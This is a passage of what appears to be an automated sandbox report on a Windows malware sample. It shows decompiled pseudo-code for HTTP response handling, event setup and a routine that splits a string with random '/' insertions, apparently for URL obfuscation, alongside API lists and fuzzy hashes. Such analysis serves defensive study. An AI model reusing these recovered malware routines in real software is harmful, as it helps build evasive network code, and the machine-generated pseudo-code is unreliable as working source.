                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t61 = __esi;
                                                                                                                                                                                                                        				_t59 = __ecx;
                                                                                                                                                                                                                        				_t60 =  *0x26fd140; // 0x26fab51
                                                                                                                                                                                                                        				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                                                        				do {
                                                                                                                                                                                                                        					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                                                        					_v20 = _t34;
                                                                                                                                                                                                                        					if(_t34 != 0) {
                                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                                        						_push( &_v16);
                                                                                                                                                                                                                        						_push( &_v8);
                                                                                                                                                                                                                        						_push(_t61 + 0x2c);
                                                                                                                                                                                                                        						_push(0x20000013);
                                                                                                                                                                                                                        						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                        						_v8 = 4;
                                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                                        						if( *_t60() == 0) {
                                                                                                                                                                                                                        							_t39 = GetLastError();
                                                                                                                                                                                                                        							_v12 = _t39;
                                                                                                                                                                                                                        							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                        								return _v12;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_v16 = 0;
                                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                                        							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                        							_t58 = E026F6D10(_v8 + 1);
                                                                                                                                                                                                                        							if(_t58 == 0) {
                                                                                                                                                                                                                        								_v12 = 8;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_push( &_v16);
                                                                                                                                                                                                                        								_push( &_v8);
                                                                                                                                                                                                                        								_push(_t58);
                                                                                                                                                                                                                        								_push(0x16);
                                                                                                                                                                                                                        								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                        								if( *_t60() == 0) {
                                                                                                                                                                                                                        									E026F45B3(_t58);
                                                                                                                                                                                                                        									_v12 = GetLastError();
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                                                        									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                                                        					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                                                        					_v12 = _t56;
                                                                                                                                                                                                                        					if(_t56 != 0) {
                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                        					_t42 = E026F5802( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                                                        					_v12 = _t42;
                                                                                                                                                                                                                        				} while (_t42 == 0);
                                                                                                                                                                                                                        				goto L15;
                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                        0x026f4383
                                                                                                                                                                                                                        0x026f4383
                                                                                                                                                                                                                        0x026f438d
                                                                                                                                                                                                                        0x026f4393
                                                                                                                                                                                                                        0x026f4396
                                                                                                                                                                                                                        0x026f439a
                                                                                                                                                                                                                        0x026f43a0
                                                                                                                                                                                                                        0x026f43a5
                                                                                                                                                                                                                        0x026f43be
                                                                                                                                                                                                                        0x026f43c1
                                                                                                                                                                                                                        0x026f43c5
                                                                                                                                                                                                                        0x026f43c9
                                                                                                                                                                                                                        0x026f43ca
                                                                                                                                                                                                                        0x026f43cf
                                                                                                                                                                                                                        0x026f43d2
                                                                                                                                                                                                                        0x026f43d9
                                                                                                                                                                                                                        0x026f43e0
                                                                                                                                                                                                                        0x026f4433
                                                                                                                                                                                                                        0x026f4439
                                                                                                                                                                                                                        0x026f443f
                                                                                                                                                                                                                        0x026f447a
                                                                                                                                                                                                                        0x026f4480
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f443f
                                                                                                                                                                                                                        0x026f43e6
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f43ed
                                                                                                                                                                                                                        0x026f43fb
                                                                                                                                                                                                                        0x026f43fe
                                                                                                                                                                                                                        0x026f4401
                                                                                                                                                                                                                        0x026f440d
                                                                                                                                                                                                                        0x026f4411
                                                                                                                                                                                                                        0x026f4473
                                                                                                                                                                                                                        0x026f4413
                                                                                                                                                                                                                        0x026f4416
                                                                                                                                                                                                                        0x026f441a
                                                                                                                                                                                                                        0x026f441b
                                                                                                                                                                                                                        0x026f441c
                                                                                                                                                                                                                        0x026f441e
                                                                                                                                                                                                                        0x026f4425
                                                                                                                                                                                                                        0x026f4463
                                                                                                                                                                                                                        0x026f446e
                                                                                                                                                                                                                        0x026f4427
                                                                                                                                                                                                                        0x026f442a
                                                                                                                                                                                                                        0x026f442e
                                                                                                                                                                                                                        0x026f442e
                                                                                                                                                                                                                        0x026f4425
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4411
                                                                                                                                                                                                                        0x026f43e6
                                                                                                                                                                                                                        0x026f43aa
                                                                                                                                                                                                                        0x026f43b0
                                                                                                                                                                                                                        0x026f43b3
                                                                                                                                                                                                                        0x026f43b8
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4448
                                                                                                                                                                                                                        0x026f4450
                                                                                                                                                                                                                        0x026f4455
                                                                                                                                                                                                                        0x026f4458
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,73BB81D0,00000000,00000000), ref: 026F439A
                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?), ref: 026F43AA
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 026F4433
                                                                                                                                                                                                                          • Part of subcall function 026F5802: WaitForMultipleObjects.KERNEL32(00000002,026FA841,00000000,026FA841,?,?,?,026FA841,0000EA60), ref: 026F581D
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 026F4468
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 602384898-0
                                                                                                                                                                                                                        • Opcode ID: 199624f37391f7b4c59cc2813ed53dafb36e692ce37a096977b3a35c26c0ca07
                                                                                                                                                                                                                        • Instruction ID: d4f749c27dd9a64c016f133fb110ab5ee013f71c8f1a44290332953cb3fcd895
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 199624f37391f7b4c59cc2813ed53dafb36e692ce37a096977b3a35c26c0ca07
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931F0B5D00209EFDF60DFA5C884A9FBBF8FB08344F10496AE742A2650DB759A459F60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 39%
                                                                                                                                                                                                                        			E026F8155(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                                        				signed int* _t39;
                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t36 = __ecx;
                                                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				_v12 = _a4;
                                                                                                                                                                                                                        				_t38 = E026F6427(__ecx,  &_v32);
                                                                                                                                                                                                                        				if(_t38 != 0) {
                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                        					_t39 = _a8;
                                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                                        					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                        						_t23 =  &(_t39[1]);
                                                                                                                                                                                                                        						if(_t39[1] != 0) {
                                                                                                                                                                                                                        							E026FA468(_t23);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					return _t38;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(E026F3A8E(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t40 = CreateEventA(0x26fd2a8, 1, 0,  *0x26fd340);
                                                                                                                                                                                                                        				if(_t40 != 0) {
                                                                                                                                                                                                                        					SetEvent(_t40);
                                                                                                                                                                                                                        					Sleep(0xbb8);
                                                                                                                                                                                                                        					CloseHandle(_t40);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_push( &_v32);
                                                                                                                                                                                                                        				if(_a12 == 0) {
                                                                                                                                                                                                                        					_t29 = E026F822C(_t36);
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_t29 = E026F8C1A(_t36);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t41 = _v16;
                                                                                                                                                                                                                        				_t38 = _t29;
                                                                                                                                                                                                                        				if(_v16 != 0) {
                                                                                                                                                                                                                        					E026F3B83(_t41);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_t38 != 0) {
                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t39 = _a8;
                                                                                                                                                                                                                        					_t38 = E026F8F5F( &_v32, _t39);
                                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                        0x026f8155
                                                                                                                                                                                                                        0x026f8162
                                                                                                                                                                                                                        0x026f8168
                                                                                                                                                                                                                        0x026f8169
                                                                                                                                                                                                                        0x026f816a
                                                                                                                                                                                                                        0x026f816b
                                                                                                                                                                                                                        0x026f816c
                                                                                                                                                                                                                        0x026f8170
                                                                                                                                                                                                                        0x026f817c
                                                                                                                                                                                                                        0x026f8180
                                                                                                                                                                                                                        0x026f8208
                                                                                                                                                                                                                        0x026f8208
                                                                                                                                                                                                                        0x026f820b
                                                                                                                                                                                                                        0x026f820d
                                                                                                                                                                                                                        0x026f8215
                                                                                                                                                                                                                        0x026f821b
                                                                                                                                                                                                                        0x026f821e
                                                                                                                                                                                                                        0x026f821e
                                                                                                                                                                                                                        0x026f821b
                                                                                                                                                                                                                        0x026f8229
                                                                                                                                                                                                                        0x026f8229
                                                                                                                                                                                                                        0x026f8193
                                                                                                                                                                                                                        0x026f8195
                                                                                                                                                                                                                        0x026f8195
                                                                                                                                                                                                                        0x026f81ac
                                                                                                                                                                                                                        0x026f81b0
                                                                                                                                                                                                                        0x026f81b3
                                                                                                                                                                                                                        0x026f81be
                                                                                                                                                                                                                        0x026f81c5
                                                                                                                                                                                                                        0x026f81c5
                                                                                                                                                                                                                        0x026f81ce
                                                                                                                                                                                                                        0x026f81d2
                                                                                                                                                                                                                        0x026f81e0
                                                                                                                                                                                                                        0x026f81d4
                                                                                                                                                                                                                        0x026f81d4
                                                                                                                                                                                                                        0x026f81d5
                                                                                                                                                                                                                        0x026f81d6
                                                                                                                                                                                                                        0x026f81d7
                                                                                                                                                                                                                        0x026f81d8
                                                                                                                                                                                                                        0x026f81d9
                                                                                                                                                                                                                        0x026f81d9
                                                                                                                                                                                                                        0x026f81e5
                                                                                                                                                                                                                        0x026f81e8
                                                                                                                                                                                                                        0x026f81ec
                                                                                                                                                                                                                        0x026f81ee
                                                                                                                                                                                                                        0x026f81ee
                                                                                                                                                                                                                        0x026f81f5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f81f7
                                                                                                                                                                                                                        0x026f81f7
                                                                                                                                                                                                                        0x026f8204
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8204

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateEventA.KERNEL32(026FD2A8,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730), ref: 026F81A6
                                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 026F81B3
                                                                                                                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 026F81BE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 026F81C5
                                                                                                                                                                                                                          • Part of subcall function 026F822C: WaitForSingleObject.KERNEL32(00000000,?,?,?,026F81E5,?,026F81E5,?,?,?,?,?,026F81E5,?), ref: 026F8306
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2559942907-0
                                                                                                                                                                                                                        • Opcode ID: a3d49c503df6247264578c40a6b9a7b12bee4bde0771208f0308285d2562690f
                                                                                                                                                                                                                        • Instruction ID: 90f55b8f1200b3c5b3e150842392ea1fcfd5dcb86b7abd658be2df993b702735
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d49c503df6247264578c40a6b9a7b12bee4bde0771208f0308285d2562690f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F21D733D00119ABDF90FFE4D8C49DEB7ADEB45354B0549A9EB11E7200D734AD428BA4
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                        			E026F2070(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                                        				signed short _t23;
                                                                                                                                                                                                                        				char* _t27;
                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                        				unsigned int _t33;
                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                        				unsigned int _t38;
                                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t42 = __eax;
                                                                                                                                                                                                                        				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                        				_t38 = __eax;
                                                                                                                                                                                                                        				_t30 = RtlAllocateHeap( *0x26fd238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                        				_v12 = _t30;
                                                                                                                                                                                                                        				if(_t30 != 0) {
                                                                                                                                                                                                                        					_v8 = _t42;
                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                        						_t33 = 0x18;
                                                                                                                                                                                                                        						if(_t38 <= _t33) {
                                                                                                                                                                                                                        							_t33 = _t38;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t21 =  *0x26fd250; // 0x1e96b4f9
                                                                                                                                                                                                                        						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                        						 *0x26fd250 = _t23;
                                                                                                                                                                                                                        						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                        						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                        						_v8 = _v8 + _t45;
                                                                                                                                                                                                                        						_t27 = _t30 + _t45;
                                                                                                                                                                                                                        						_t38 = _t38 - _t45;
                                                                                                                                                                                                                        						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                        						 *_t27 = 0x2f;
                                                                                                                                                                                                                        						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                        						_t30 = _t13;
                                                                                                                                                                                                                        					} while (_t38 > 8);
                                                                                                                                                                                                                        					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v12;
                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                        0x026f2078
                                                                                                                                                                                                                        0x026f207b
                                                                                                                                                                                                                        0x026f2081
                                                                                                                                                                                                                        0x026f2099
                                                                                                                                                                                                                        0x026f209b
                                                                                                                                                                                                                        0x026f20a0
                                                                                                                                                                                                                        0x026f20a2
                                                                                                                                                                                                                        0x026f20a5
                                                                                                                                                                                                                        0x026f20a7
                                                                                                                                                                                                                        0x026f20aa
                                                                                                                                                                                                                        0x026f20ac
                                                                                                                                                                                                                        0x026f20ac
                                                                                                                                                                                                                        0x026f20ae
                                                                                                                                                                                                                        0x026f20b9
                                                                                                                                                                                                                        0x026f20be
                                                                                                                                                                                                                        0x026f20cf
                                                                                                                                                                                                                        0x026f20d7
                                                                                                                                                                                                                        0x026f20dc
                                                                                                                                                                                                                        0x026f20df
                                                                                                                                                                                                                        0x026f20e2
                                                                                                                                                                                                                        0x026f20e4
                                                                                                                                                                                                                        0x026f20e7
                                                                                                                                                                                                                        0x026f20ea
                                                                                                                                                                                                                        0x026f20ea
                                                                                                                                                                                                                        0x026f20ed
                                                                                                                                                                                                                        0x026f20f8
                                                                                                                                                                                                                        0x026f20fd
                                                                                                                                                                                                                        0x026f2107

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,026F6A62,00000000,?,?,026F88FB,?,04B395B0), ref: 026F207B
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 026F2093
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,04B395B0,-00000008,?,?,?,026F6A62,00000000,?,?,026F88FB,?,04B395B0), ref: 026F20D7
                                                                                                                                                                                                                        • memcpy.NTDLL(00000001,04B395B0,00000001,026F88FB,?,04B395B0), ref: 026F20F8
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1819133394-0
                                                                                                                                                                                                                        • Opcode ID: 4ba2de8ebf7290b6f950ae8810ac94e8f3fa4b6261362a16b58b5111611b52b9
                                                                                                                                                                                                                        • Instruction ID: c3191b7ac523fbb3dc313d6d370276a1b490f3dbc8b6f5d2de05f8a5020ad41f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ba2de8ebf7290b6f950ae8810ac94e8f3fa4b6261362a16b58b5111611b52b9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB11E372E00154ABCB50CBA9DC88D9EBBAADB85250B05017AFA0497240E7719E10CBA0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                                        			E026F1C78(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                                        				char* _t18;
                                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t19 = 0x27;
                                                                                                                                                                                                                        				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                        				_t18 = 0;
                                                                                                                                                                                                                        				E026F5043(_t8, _t1);
                                                                                                                                                                                                                        				_t16 = E026F6D10(_t19);
                                                                                                                                                                                                                        				if(_t16 != 0) {
                                                                                                                                                                                                                        					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                        					_t13 = E026FA677(_t3, _t16, _a8);
                                                                                                                                                                                                                        					if(_a4 != 0) {
                                                                                                                                                                                                                        						__imp__(_a4);
                                                                                                                                                                                                                        						_t19 = _t13 + 0x27;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t18 = E026F6D10(_t19);
                                                                                                                                                                                                                        					if(_t18 != 0) {
                                                                                                                                                                                                                        						 *_t18 = 0;
                                                                                                                                                                                                                        						if(_a4 != 0) {
                                                                                                                                                                                                                        							__imp__(_t18, _a4);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						__imp__(_t18, _t16);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					E026F45B3(_t16);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t18;
                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                        0x026f1c83
                                                                                                                                                                                                                        0x026f1c84
                                                                                                                                                                                                                        0x026f1c87
                                                                                                                                                                                                                        0x026f1c89
                                                                                                                                                                                                                        0x026f1c94
                                                                                                                                                                                                                        0x026f1c98
                                                                                                                                                                                                                        0x026f1c9d
                                                                                                                                                                                                                        0x026f1ca1
                                                                                                                                                                                                                        0x026f1ca9
                                                                                                                                                                                                                        0x026f1cae
                                                                                                                                                                                                                        0x026f1cb6
                                                                                                                                                                                                                        0x026f1cb6
                                                                                                                                                                                                                        0x026f1cbf
                                                                                                                                                                                                                        0x026f1cc3
                                                                                                                                                                                                                        0x026f1cc9
                                                                                                                                                                                                                        0x026f1ccc
                                                                                                                                                                                                                        0x026f1cd2
                                                                                                                                                                                                                        0x026f1cd2
                                                                                                                                                                                                                        0x026f1cda
                                                                                                                                                                                                                        0x026f1cda
                                                                                                                                                                                                                        0x026f1ce1
                                                                                                                                                                                                                        0x026f1ce1
                                                                                                                                                                                                                        0x026f1cec

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                          • Part of subcall function 026FA677: wsprintfA.USER32 ref: 026FA6D3
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,026F8594,74666F53,00000000,?,026FD00C,?,?), ref: 026F1CAE
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 026F1CD2
                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 026F1CDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                        • String ID: Soft
                                                                                                                                                                                                                        • API String ID: 393707159-3753413193
                                                                                                                                                                                                                        • Opcode ID: 72ae0ed2a4100f68e6e828817a3f43fda74bf8a6cf33c8089bba8084ed53f998
                                                                                                                                                                                                                        • Instruction ID: 5b334f89be15eb76a9be35691972aacb01f410fa80095b225b02177e89b2a840
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ae0ed2a4100f68e6e828817a3f43fda74bf8a6cf33c8089bba8084ed53f998
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22012632500109F7CF527BA5DC84AAF3AADAF81389F000425FB0896200DB7ACA429BE0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026FA40A(void* __esi) {
                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v4 = 0;
                                                                                                                                                                                                                        				memset(__esi, 0, 0x38);
                                                                                                                                                                                                                        				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                        				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                                                                        					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                        					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                                                        					if(_t10 == 0) {
                                                                                                                                                                                                                        						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_v4 = 1;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v4;
                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                        0x026fa414
                                                                                                                                                                                                                        0x026fa418
                                                                                                                                                                                                                        0x026fa42d
                                                                                                                                                                                                                        0x026fa42f
                                                                                                                                                                                                                        0x026fa434
                                                                                                                                                                                                                        0x026fa43a
                                                                                                                                                                                                                        0x026fa43c
                                                                                                                                                                                                                        0x026fa441
                                                                                                                                                                                                                        0x026fa44c
                                                                                                                                                                                                                        0x026fa443
                                                                                                                                                                                                                        0x026fa443
                                                                                                                                                                                                                        0x026fa443
                                                                                                                                                                                                                        0x026fa441
                                                                                                                                                                                                                        0x026fa45a

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • memset.NTDLL ref: 026FA418
                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,73BB81D0,00000000,00000000), ref: 026FA42D
                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 026FA43A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?), ref: 026FA44C
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
